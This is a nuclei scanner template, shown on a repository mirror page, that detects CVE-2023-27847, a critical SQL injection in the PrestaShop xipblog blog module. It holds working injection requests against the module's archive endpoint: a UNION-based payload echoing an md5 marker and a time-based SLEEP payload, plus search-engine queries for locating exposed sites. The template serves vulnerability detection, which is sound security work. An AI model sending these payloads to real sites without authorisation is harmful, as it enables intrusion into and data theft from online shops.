daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2023/CVE-2023-27847.yaml

70 lines
2.3 KiB
YAML
Raw Blame History

id: CVE-2023-27847
info:
name: PrestaShop xipblog - SQL Injection
author: mastercho
severity: critical
description: |
In the blog module (xipblog), an anonymous user can perform SQL injection. Even though the module has been patched in version 2.0.1, the version number was not incremented at the time.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
reference:
- https://security.friendsofpresta.org/modules/2023/03/23/xipblog.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-27847
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-27847
cwe-id: CWE-89
epss-score: 0.04685
epss-percentile: 0.91818
metadata:
verified: true
max-request: 2
framework: prestashop
shodan-query: html:"/xipblog"
fofa-query: app="Prestashop"
tags: time-based-sqli,cve,cve2023,prestashop,sqli,xipblog
flow: http(1) && http(2)
variables:
num: "999999999"
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_any(tolower(response), "prestashop", "xipblog")'
internal: true
- raw:
- |
@timeout: 20s
GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}})),NULL,NULL--+- HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 20s
GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+(SELECT+5728+FROM+(SELECT(SLEEP(6)))AuDU)--+lafl HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
host-redirects: true
matchers:
- type: word
name: union-based
part: body_1
words:
- '{{md5({{num}})}}'
- type: dsl
name: time-based
dsl:
- 'duration_2>=6'
# digest: 4a0a00473045022100ee8271677f415ca4c4b08feef9da01311967e2b3edba130957466c852f81abdc02205b5163cdbae603a0d7d2ee225ddf03cb7c0dc41baaa66702977a26a34d94c5ae:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink